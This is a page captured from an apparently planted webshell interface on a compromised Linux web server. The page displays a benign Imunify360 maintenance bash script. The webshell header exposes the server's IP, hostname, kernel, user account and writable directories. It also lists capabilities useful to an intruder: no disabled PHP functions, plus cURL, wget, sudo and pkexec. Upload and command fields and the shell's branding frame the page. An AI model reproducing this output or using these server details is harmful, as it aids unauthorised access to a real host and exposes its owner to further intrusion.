- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.116.49.143
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/i360-storage-mkcustom
#!/bin/bash

LOCKFILE=/usr/share/i360-php-opts/i360storagemkcustom.lock
if [ -e ${LOCKFILE} ] && kill -0 `cat ${LOCKFILE}`; then
    echo "already running" 1>&2
    exit 1
fi

trap "rm -f ${LOCKFILE}; exit" INT TERM EXIT
echo $$ > ${LOCKFILE}
chmod 600 ${LOCKFILE}

if [ ! -e /usr/share/i360-php-opts/phpimunity.compiled.rules ]; then
  mkdir /usr/share/i360-php-opts/phpimunity.compiled.rules
  chmod 755 /usr/share/i360-php-opts/phpimunity.compiled.rules
fi

if [ -e /usr/share/i360-php-opts/phpimunity.compiled.rules ]; then
  if [ -z "$1" -o ! -e "$1" ]; then
    echo "Can't find $1 file" 1>&2
    rm -f ${LOCKFILE}
    exit 1
  fi
  # TODO: move to i360 agent
  find /var/imunify360/files/php-immunity/ -name "suspicious_files_list.89100" -exec cp {} /usr/share/i360-php-opts/phpimunity.compiled.rules \;
  pushd /usr/share/i360-php-opts/phpimunity.compiled.rules &>/dev/null
  rm -f /usr/share/i360-php-opts/phpimunity.compiled.rules/*.slist
  rm -f /usr/share/i360-php-opts/phpimunity.compiled.rules/*.srule
  i360-storage.immunity mksbins "$1"
  popd &>/dev/null
  rm -f ${LOCKFILE}
  exit 0
fi

echo "Can't find /usr/share/i360-php-opts/phpimunity.compiled.rules directory" 1>&2
rm -f ${LOCKFILE}
exit 1

Youez - 2016 - github.com/yon3zu
LinuXploit